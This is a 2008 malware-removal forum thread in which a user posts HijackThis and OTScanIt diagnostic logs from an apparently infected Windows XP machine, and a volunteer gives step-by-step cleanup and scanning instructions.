Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help, and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.

Malware Removal Instructions

Please view

MalwareRemoval.com provides free support for people with infected computers. Using plain language that anyone can understand, our community of volunteer experts will walk you through each step.

Please view

Unread postby tboxcar » August 20th, 2008, 9:32 pm

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 6:27:16 PM, on 8/20/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16705)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Dell Photo AIO Printer 926\dlcxmon.exe
C:\Program Files\Dell Photo AIO Printer 926\memcard.exe
C:\Program Files\Corel\Corel Photo Album 6\MediaDetect.exe
C:\Program Files\Common Files\AOL\1210902639\ee\AOLSoftware.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Trend Micro\Internet Security 14\pccguide.exe
C:\WINDOWS\system32\wscript.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Trend Micro\Internet Security 14\TMAS_OE\TMAS_OEMon.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\WINDOWS\system32\dlcxcoms.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
c:\program files\aol\aol toolbar 5.0\AolTbServer.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\tsc.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com/ig/dell?hl=en&cli ... bd=0080430
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.radzservices.blogspot.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Page_URL = http://www.google.com/ig/dell?hl=en&cli ... bd=0080430
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://support.dell.com/support/downloa ... x=dellspct
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Long Live Sowar!!!
R3 - URLSearchHook: AOLTBSearch Class - {EA756889-2338-43DB-8F07-D1CA6FB9C90D} - C:\Program Files\AOL\AOL Toolbar 5.0\aoltb.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: AOL Toolbar Launcher - {7C554162-8CB7-45A4-B8F4-8EA1C75885F9} - C:\Program Files\AOL\AOL Toolbar 5.0\aoltb.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll
O2 - BHO: Browser Address Error Redirector - {CA6319C0-31B7-401E-A518-A07C3DB8F777} - C:\Program Files\Dell\BAE\BAE.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: AOL Toolbar - {DE9C389F-3316-41A7-809B-AA305ED9D922} - C:\Program Files\AOL\AOL Toolbar 5.0\aoltb.dll
O4 - HKLM\..\Run: [dlcxmon.exe] "C:\Program Files\Dell Photo AIO Printer 926\dlcxmon.exe"
O4 - HKLM\..\Run: [MemoryCardManager] "C:\Program Files\Dell Photo AIO Printer 926\memcard.exe"
O4 - HKLM\..\Run: [DLCXCATS] rundll32 C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\DLCXtime.dll,_RunDLLEntry@16
O4 - HKLM\..\Run: [FaxCenterServer] "C:\Program Files\Dell PC Fax\fm3032.exe" /s
O4 - HKLM\..\Run: [Corel Photo Downloader] C:\Program Files\Corel\Corel Photo Album 6\MediaDetect.exe
O4 - HKLM\..\Run: [ISUSPM Startup] "C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe" -startup
O4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1210902639\ee\AOLSoftware.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Internet Security 14\pccguide.exe"
O4 - HKLM\..\Run: [System Restore] wscript.exe "C:\WINDOWS\SysRes.vbs"
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [OE_OEM] "C:\Program Files\Trend Micro\Internet Security 14\TMAS_OE\TMAS_OEMon.exe"
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: &AOL Toolbar Search - c:\program files\aol\aol toolbar 5.0\resources\en-US\local\search.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: AOL Toolbar - {3369AF0D-62E9-4bda-8103-B4C75499B578} - C:\Program Files\AOL\AOL Toolbar 5.0\aoltb.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {26FCCDF9-A7E1-452A-A73D-7BF7B4D0BA6C} (AOL Pictures Uploader Class) - http://o.aolcdn.com/pictures/ap/Resourc ... .6.0.8.cab
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~2\GOEC62~1.DLL
O20 - Winlogon Notify: GoToAssist - C:\Program Files\Citrix\GoToAssist\514\G2AWinLogon.dll
O23 - Service: AOL Connectivity Service (AOL ACS) - AOL LLC - C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
O23 - Service: dlcx_device - - C:\WINDOWS\system32\dlcxcoms.exe
O23 - Service: GoToAssist - Citrix Online, a division of Citrix Systems, Inc. - C:\Program Files\Citrix\GoToAssist\514\g2aservice.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
O23 - Service: Trend Micro Personal Firewall (TmPfw) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe

--
End of file - 7904 bytes
tboxcar
Active Member
 
Posts: 6
Joined: August 20th, 2008, 9:22 pm
Advertisement
Register to Remove

Re: Please view

Unread postby ndmmxiaomayi » August 24th, 2008, 2:31 am

Hello,

Please do the following:

Step 1

Click on Start > Run.

Copy and paste in notepad.exe C:\WINDOWS\SysRes.vbs

Click OK.

A Notepad file will open. Please copy and paste the contents of this file in your next reply.

Step 2

  1. Open HijackThis.
  2. Click on the Open the Misc Tools section button.
  3. Look under System tools.
  4. Click on the Open Uninstall Manager... button.
  5. Click on the Save list... button.
  6. It will prompt you to save. Save this log in a convenient location. By default it's named uninstall_list.txt.
  7. Notepad will open. Please post this log in your next reply.

Step 3

  1. Please download Flash_Disinfector and save it to your desktop.
  2. Double click to run it.
  3. You will be prompted to plug in your flash drive. Plug it in.
  4. Flash_Disinfector will start disinfecting your flash and hard drives. This takes a few seconds. Your desktop will disappear in the meantime.
  5. When done, a message box will appear. Click OK. Your desktop should now appear. If it doesn't, press Ctrl + Shift + Esc to open Task Manager.
  6. Click on File > New Task (Run...). Type in explorer.exe and press Enter. Your desktop should now appear.

Step 4

  1. Please download OTScanIt.exe from Bleeping Computer by OldTimer and save it to your desktop.
  2. Double click on OTScanIt.exe to run it.
  3. Click on Extract. Once done, you will be prompted. Click OK and click Close.
  4. Double click on the OTScanIt folder. Double click on OTScanIt.exe to run it. When OTScanIt opens, please choose the following scan options:
    • Under Drivers, select Non-Microsoft.
    • Under Rootkit Search, select Yes.
    • Under Additional Scans, check (tick) these boxes:
      • Reg - MS Config Disabled Items
      • Reg - MountPoints2
      • File - Lop Check
      • File - Purity Scan
      • Evnt - EventViewer Errors/Warnings (Last 7 days)
  5. Click on the Run Scan button at the top left hand corner.
  6. OTScanIt will start running. Once done, Notepad will open. Please post the contents of this Notepad file in your next reply.

In your next reply, please post:

  1. Contents of Notepad file that opens from Step 1
  2. Uninstall List from Step 2
  3. OTScanIt report from Step 4
ndmmxiaomayi
MRU Emeritus
MRU Emeritus
 
Posts: 9708
Joined: July 17th, 2006, 9:22 am

Re: Please view

Unread postby tboxcar » August 24th, 2008, 1:10 pm

Step 1 (Copy and paste in Run) 'notepad.exe C:\WINDOWS\SysRes.vbs

Nothing came up in notepad, something about missing SysRes.vbs 'file missing' ???

Step 2

ABBYY FineReader 6.0 Sprint
Adobe Acrobat and Reader 8.1.2 Security Update 1 (KB403742)
Adobe Flash Player ActiveX
Adobe Photoshop 7.0
Adobe Reader 8.1.2
AOL Pictures Tools (version 10.6.0.8)
AOL Toolbar 5.0
AOL Uninstaller (Choose which Products to Remove)
Apple Software Update
Browser Address Error Redirector
Compatibility Pack for the 2007 Office system
Corel Photo Album 6
Debugging Tools for Windows (x86)
Dell DataSafe Online
Dell Driver Reset Tool
Dell PC Fax
Dell Photo AIO Printer 926
Dell Support Center
Documentation & Support Launcher
Flickr Uploadr 3.0.5
Games, Music, & Photos Launcher
Google Desktop
Google Earth
Google Toolbar for Internet Explorer
Google Toolbar for Internet Explorer
Google Updater
GoToAssist 8.0.0.514
High Definition Audio Driver Package - KB835221
HijackThis 2.0.2
Hotfix for Windows Internet Explorer 7 (KB947864)
Hotfix for Windows XP (KB952287)
Intel(R) Graphics Media Accelerator Driver
Intel(R) PRO Network Connections 12.1.12.0
Internet Service Offers Launcher
J2SE Runtime Environment 5.0 Update 6
Microsoft .NET Framework 1.1
Microsoft .NET Framework 1.1
Microsoft .NET Framework 1.1 Hotfix (KB928366)
Microsoft Internationalized Domain Names Mitigation APIs
Microsoft National Language Support Downlevel APIs
Microsoft Office PowerPoint Viewer 2007 (English)
Microsoft Plus! Digital Media Edition Installer
Microsoft Plus! Photo Story 2 LE
Microsoft Silverlight
Microsoft Visual C++ 2005 Redistributable
Microsoft Works
Mozilla Firefox (2.0.0.16)
MSXML 4.0 SP2 (KB936181)
MSXML 6.0 Parser (KB933579)
Musicmatch for Windows Media Player
PowerDVD
QuickTime
RealPlayer
Realtek High Definition Audio Driver
Roxio Creator Audio
Roxio Creator Copy
Roxio Creator Data
Roxio Creator DE
Roxio Creator DE
Roxio Creator Tools
Roxio Express Labeler 3
Roxio Update Manager
SafeGuard
SearchAssist
Security Update for Step By Step Interactive Training (KB923723)
Security Update for Windows Internet Explorer 7 (KB938127)
Security Update for Windows Internet Explorer 7 (KB944533)
Security Update for Windows Internet Explorer 7 (KB950759)
Security Update for Windows Internet Explorer 7 (KB953838)
Security Update for Windows XP (KB941569)
Security Update for Windows XP (KB946648)
Security Update for Windows XP (KB950760)
Security Update for Windows XP (KB950762)
Security Update for Windows XP (KB950974)
Security Update for Windows XP (KB951066)
Security Update for Windows XP (KB951376)
Security Update for Windows XP (KB951376-v2)
Security Update for Windows XP (KB951698)
Security Update for Windows XP (KB951748)
Security Update for Windows XP (KB952954)
Security Update for Windows XP (KB953839)
Trend Micro PC-cillin Internet Security 14
Trend Micro PC-cillin Internet Security 14
Update for Windows XP (KB951072-v2)
Update for Windows XP (KB951978)
Viewpoint Media Player
Windows Media Format Runtime
Windows Media Player 10
Windows Media Player 10
Windows XP Service Pack 3
WinZip Self-Extractor

Step 4

Code: Select all
OTScanIt logfile created on: 8/24/2008 9:56:31 AM
OTScanIt by OldTimer - Version 1.0.16.2     Folder = C:\Documents and Settings\Tom\Desktop\OTScanIt
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
1.99 Gb Total Physical Memory | 1.29 Gb Available Physical Memory | 64.82% Memory free
3.84 Gb Paging File | 3.29 Gb Available in Paging File | 85.82% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092;
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 229.47 Gb Total Space | 213.17 Gb Free Space | 92.89% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
Drive I: | 5.46 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
Drive K: | 5.49 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
Drive L: | 973.16 Mb Total Space | 863.97 Mb Free Space | 88.78% Space Free | Partition Type: FAT
Drive M: | 1.90 Gb Total Space | 0.12 Gb Free Space | 6.41% Space Free | Partition Type: FAT

Computer Name: D81YX6G1
Current User Name: Tom
Logged in as Administrator.
Current Boot Mode: Normal
Scan Mode: Current user

[Processes - Non-Microsoft Only]
dlcxmon.exe -> %ProgramFiles%\Dell Photo AIO Printer 926\dlcxmon.exe ->  [Ver = 0.1.25.0 | Size = 292336 bytes | Modified Date = 1/12/2007 9:57:28 AM | Attr =    ]
memcard.exe -> %ProgramFiles%\Dell Photo AIO Printer 926\memcard.exe ->  [Ver = 1.0.21.0 | Size = 304008 bytes | Modified Date = 11/3/2006 3:04:46 PM | Attr =    ]
mediadetect.exe -> %ProgramFiles%\Corel\Corel Photo Album 6\MediaDetect.exe -> Corel, Inc. [Ver = 6.0.0 (20050831.10) | Size = 106496 bytes | Modified Date = 8/31/2005 11:06:18 AM | Attr =    ]
aolsoftware.exe -> %CommonProgramFiles%\aol\1210902639\ee\aolsoftware.exe -> AOL LLC [Ver = 15.5.1.2 | Size = 42032 bytes | Modified Date = 5/25/2007 10:16:08 AM | Attr =    ]
realsched.exe -> %CommonProgramFiles%\Real\Update_OB\realsched.exe -> RealNetworks, Inc. [Ver = 0.1.1.45 | Size = 185896 bytes | Modified Date = 5/15/2008 9:35:25 PM | Attr =    ]
pccguide.exe -> %ProgramFiles%\Trend Micro\Internet Security 14\pccguide.exe -> Trend Micro Inc. [Ver = 14.60.0.1195 | Size = 1807960 bytes | Modified Date = 11/21/2006 2:02:24 PM | Attr =    ]
googletoolbarnotifier.exe -> %ProgramFiles%\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe -> Google Inc. [Ver = 2, 0, 301, 1654 | Size = 68856 bytes | Modified Date = 4/30/2008 8:20:51 AM | Attr =    ]
tmas_oemon.exe -> %ProgramFiles%\Trend Micro\Internet Security 14\TMAS_OE\TMAS_OEMon.exe -> Trend Micro Inc. [Ver = 3.53.0.1041 | Size = 321040 bytes | Modified Date = 8/4/2006 4:15:28 PM | Attr =    ]
aolload.exe -> %CommonProgramFiles%\aol\Loader\aolload.exe -> AOL LLC [Ver = 9.3.2.2 | Size = 10800 bytes | Modified Date = 11/3/2006 12:17:27 AM | Attr =    ]
aolacsd.exe -> %CommonProgramFiles%\aol\acs\AOLacsd.exe -> AOL LLC [Ver = 4.6.1.2               | Size = 46640 bytes | Modified Date = 10/23/2006 5:50:35 AM | Attr = R  ]
dlcxcoms.exe -> %SystemRoot%\system32\dlcxcoms.exe ->   [Ver = 99.99.99.99 | Size = 532480 bytes | Modified Date = 10/11/2006 2:48:50 PM | Attr =    ]
googleupdaterservice.exe -> %ProgramFiles%\Google\Common\Google Updater\GoogleUpdaterService.exe -> Google [Ver = 2.2.1175.1407.beta | Size = 137200 bytes | Modified Date = 5/8/2008 8:19:40 PM | Attr =    ]
pcctlcom.exe -> %ProgramFiles%\Trend Micro\Internet Security 14\PcCtlCom.exe -> Trend Micro Inc. [Ver = 14.60.0.1206 | Size = 1475936 bytes | Modified Date = 5/19/2008 4:17:14 PM | Attr =    ]
tmntsrv.exe -> %ProgramFiles%\Trend Micro\Internet Security 14\Tmntsrv.exe -> Trend Micro Inc. [Ver = 14.60.0.1180 | Size = 345696 bytes | Modified Date = 9/18/2006 2:50:54 PM | Attr =    ]
tmpfw.exe -> %ProgramFiles%\Trend Micro\Internet Security 14\TmPfw.exe -> Trend Micro Inc. [Ver = 2.6.0.1050 | Size = 923216 bytes | Modified Date = 11/9/2006 4:03:42 PM | Attr =    ]
tmproxy.exe -> %ProgramFiles%\Trend Micro\Internet Security 14\tmproxy.exe -> Trend Micro Inc. [Ver = 2.1.0.1050 | Size = 566872 bytes | Modified Date = 11/9/2006 4:04:02 PM | Attr =    ]
launchpad.exe -> %AppData%\U3\0000060512123671\LaunchPad.exe ->  [Ver = 1, 1, 0, 2 | Size = 4231168 bytes | Modified Date = 5/11/2006 3:41:42 PM | Attr =    ]
waol.exe -> %ProgramFiles%\AOL 9.1\waol.exe -> AOL, LLC. [Ver = 9.05.001 | Size = 39264 bytes | Modified Date = 10/27/2007 10:45:07 AM | Attr =    ]
shellmon.exe -> %ProgramFiles%\AOL 9.1\shellmon.exe -> AOL, LLC. [Ver = 9.05.001 | Size = 54624 bytes | Modified Date = 10/27/2007 10:45:05 AM | Attr =    ]
launchpad.exe -> %AppData%\U3\0000167A67740D5B\LaunchPad.exe ->  [Ver = 1, 4, 0, 2 | Size = 4603904 bytes | Modified Date = 2/9/2007 4:47:20 PM | Attr =    ]
mcvsusb.exe -> %AppData%\U3\0000167A67740D5B\9CAC5930-4010-4AD6-ABF7-CE2778969B13\Exec\McVsUSB.exe -> McAfee, Inc. [Ver = 3,0,144,0 | Size = 529696 bytes | Modified Date = 12/17/2007 11:31:52 PM | Attr =    ]
vsusbrtm.exe -> %AppData%\U3\0000167A67740D5B\9CAC5930-4010-4AD6-ABF7-CE2778969B13\Exec\VsUSBRtm.exe -> McAfee, Inc. [Ver = 3,0,144,0 | Size = 320848 bytes | Modified Date = 8/2/2007 10:58:24 AM | Attr =    ]
otscanit.exe -> %UserProfile%\Desktop\OTScanIt\OTScanIt.exe -> OldTimer Tools [Ver = 1.0.16.2 | Size = 397312 bytes | Modified Date = 7/12/2008 9:29:54 AM | Attr =    ]

[Win32 Services - Non-Microsoft Only]
(AOL ACS) AOL Connectivity Service [Win32_Own | Auto | Running] -> %CommonProgramFiles%\aol\acs\AOLacsd.exe -> AOL LLC [Ver = 4.6.1.2               | Size = 46640 bytes | Modified Date = 10/23/2006 5:50:35 AM | Attr = R  ]
(dlcx_device) dlcx_device [Win32_Own | Auto | Running] -> %SystemRoot%\system32\dlcxcoms.exe ->   [Ver = 99.99.99.99 | Size = 532480 bytes | Modified Date = 10/11/2006 2:48:50 PM | Attr =    ]
(dmadmin) Logical Disk Manager Administrative Service [Win32_Shared | On_Demand | Stopped] -> %SystemRoot%\system32\dmadmin.exe -> Microsoft Corp., Veritas Software [Ver = 2600.5512.503.0 | Size = 224768 bytes | Modified Date = 4/13/2008 5:12:17 PM | Attr =    ]
(GoogleDesktopManager-010708-104812) Google Desktop Manager 5.7.801.7324 [Win32_Own | Disabled | Stopped] -> %ProgramFiles%\Google\Google Desktop Search\GoogleDesktop.exe -> Google [Ver = 5.7.801.7324 | Size = 29744 bytes | Modified Date = 4/30/2008 8:20:53 AM | Attr =    ]
(GoToAssist) GoToAssist [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\Citrix\GoToAssist\514\g2aservice.exe -> Citrix Online, a division of Citrix Systems, Inc. [Ver = 8.0 Build 514 | Size = 16680 bytes | Modified Date = 8/19/2008 5:54:17 PM | Attr =    ]
(gusvc) Google Updater Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Google\Common\Google Updater\GoogleUpdaterService.exe -> Google [Ver = 2.2.1175.1407.beta | Size = 137200 bytes | Modified Date = 5/8/2008 8:19:40 PM | Attr =    ]
(PcCtlCom) Trend Micro Central Control Component [Win32_Own | Auto | Running] -> %ProgramFiles%\Trend Micro\Internet Security 14\PcCtlCom.exe -> Trend Micro Inc. [Ver = 14.60.0.1206 | Size = 1475936 bytes | Modified Date = 5/19/2008 4:17:14 PM | Attr =    ]
(sprtsvc_dellsupportcenter) SupportSoft Sprocket Service (dellsupportcenter) [Win32_Own | Disabled | Stopped] -> %ProgramFiles%\Dell Support Center\bin\sprtsvc.exe -> SupportSoft, Inc. [Ver = 7.0.585.0 | Size = 202544 bytes | Modified Date = 3/11/2008 10:44:38 AM | Attr =    ]
(stllssvr) stllssvr [Win32_Own | Disabled | Stopped] -> %CommonProgramFiles%\SureThing Shared\stllssvr.exe -> MicroVision Development, Inc. [Ver = 1.2.590 | Size = 74384 bytes | Modified Date = 12/2/2007 4:34:30 PM | Attr = R  ]
(Tmntsrv) Trend Micro Real-time Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Trend Micro\Internet Security 14\Tmntsrv.exe -> Trend Micro Inc. [Ver = 14.60.0.1180 | Size = 345696 bytes | Modified Date = 9/18/2006 2:50:54 PM | Attr =    ]
(TmPfw) Trend Micro Personal Firewall [Win32_Own | Auto | Running] -> %ProgramFiles%\Trend Micro\Internet Security 14\TmPfw.exe -> Trend Micro Inc. [Ver = 2.6.0.1050 | Size = 923216 bytes | Modified Date = 11/9/2006 4:03:42 PM | Attr =    ]
(tmproxy) Trend Micro Proxy Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Trend Micro\Internet Security 14\tmproxy.exe -> Trend Micro Inc. [Ver = 2.1.0.1050 | Size = 566872 bytes | Modified Date = 11/9/2006 4:04:02 PM | Attr =    ]

[Driver Services - Non-Microsoft Only]
(AliIde) AliIde [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\aliide.sys -> Acer Laboratories Inc. [Ver = 1.20 | Size = 5248 bytes | Modified Date = 8/17/2001 11:51:56 AM | Attr =    ]
(amdagp) AMD AGP Bus Filter Driver [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\amdagp.sys -> Advanced Micro Devices, Inc. [Ver = 5.00 (xpsp.080413-2111) | Size = 43008 bytes | Modified Date = 4/13/2008 11:36:39 AM | Attr =    ]
(asc) asc [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\asc.sys -> Advanced System Products, Inc. [Ver = 2.9I-MS (XPClient.010817-1148) | Size = 26496 bytes | Modified Date = 8/17/2001 11:52:00 AM | Attr =    ]
(asc3550) asc3550 [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\asc3550.sys -> Advanced System Products, Inc. [Ver = 3.1E-MS (XPClient.010817-1148) | Size = 14848 bytes | Modified Date = 8/17/2001 11:51:58 AM | Attr =    ]
(CmdIde) CmdIde [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\cmdide.sys -> CMD Technology, Inc. [Ver = 2.0.7 (XPClient.010817-1148) | Size = 6656 bytes | Modified Date = 8/17/2001 11:51:54 AM | Attr =    ]
(dac2w2k) dac2w2k [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\dac2w2k.sys -> Mylex Corporation [Ver = 6.00-21 (XPClient.010817-1148) | Size = 179584 bytes | Modified Date = 8/17/2001 11:52:16 AM | Attr =    ]
(dmboot) dmboot [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\dmboot.sys -> Microsoft Corp., Veritas Software [Ver = 2600.5512.503.0 | Size = 799744 bytes | Modified Date = 4/13/2008 11:44:48 AM | Attr =    ]
(dmio) dmio [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\dmio.sys -> Microsoft Corp., Veritas Software [Ver = 2600.5512.503.0 | Size = 153344 bytes | Modified Date = 4/13/2008 11:44:46 AM | Attr =    ]
(dmload) dmload [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\dmload.sys -> Microsoft Corp., Veritas Software. [Ver = 2600.0.503.0 | Size = 5888 bytes | Modified Date = 8/4/2004 3:00:00 AM | Attr =    ]
(E100B) Intel(R) PRO Adapter Driver [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\e100b325.sys -> Intel Corporation [Ver = 5.41.22.0000 built by: WinDDK | Size = 117760 bytes | Modified Date = 8/17/2001 10:12:10 AM | Attr =    ]
(e1express) Intel(R) PRO/1000 PCI Express Network Connection Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\e1e5132.sys -> Intel Corporation [Ver = 9.8.20.0 built by: WinDDK | Size = 254872 bytes | Modified Date = 4/13/2007 8:33:34 PM | Attr =    ]
(HDAudBus) Microsoft UAA Bus Driver for High Definition Audio [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\hdaudbus.sys -> Windows (R) Server 2003 DDK provider [Ver = 5.10.01.5013 built by: WinDDK | Size = 144384 bytes | Modified Date = 4/13/2008 9:36:05 AM | Attr =    ]
(ialm) ialm [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\igxpmp32.sys -> Intel Corporation [Ver = 6.14.10.4820 | Size = 5760096 bytes | Modified Date = 4/16/2007 9:16:26 PM | Attr =    ]
(iaStor) Intel RAID Controller [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\iastor.sys -> Intel Corporation [Ver = 7.5.0.1017 | Size = 304920 bytes | Modified Date = 7/19/2007 4:26:24 PM | Attr =    ]
(IntcAzAudAddService) Service for Realtek HD Audio (WDM) [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\RtkHDAud.sys -> Realtek Semiconductor Corp. [Ver = 5.10.0.5408 built by: WinDDK | Size = 4403712 bytes | Modified Date = 7/16/2007 5:48:54 PM | Attr =    ]
(mraid35x) mraid35x [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\mraid35x.sys -> American Megatrends Inc. [Ver = 6.19 (XPClient.010817-1148) | Size = 17280 bytes | Modified Date = 8/17/2001 11:52:12 AM | Attr =    ]
(nv) nv [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\nv4_mini.sys -> NVIDIA Corporation [Ver = 6.14.10.5673 | Size = 1897408 bytes | Modified Date = 8/3/2004 8:29:56 PM | Attr =    ]
(Ptilink) Direct Parallel Link Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\ptilink.sys -> Parallel Technologies, Inc. [Ver = 1.10 (XPClient.010817-1148) | Size = 17792 bytes | Modified Date = 8/4/2004 3:00:00 AM | Attr =    ]
(PxHelp20) PxHelp20 [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\pxhelp20.sys -> Sonic Solutions [Ver = 3.00.70C | Size = 43840 bytes | Modified Date = 11/14/2007 1:00:00 AM | Attr =    ]
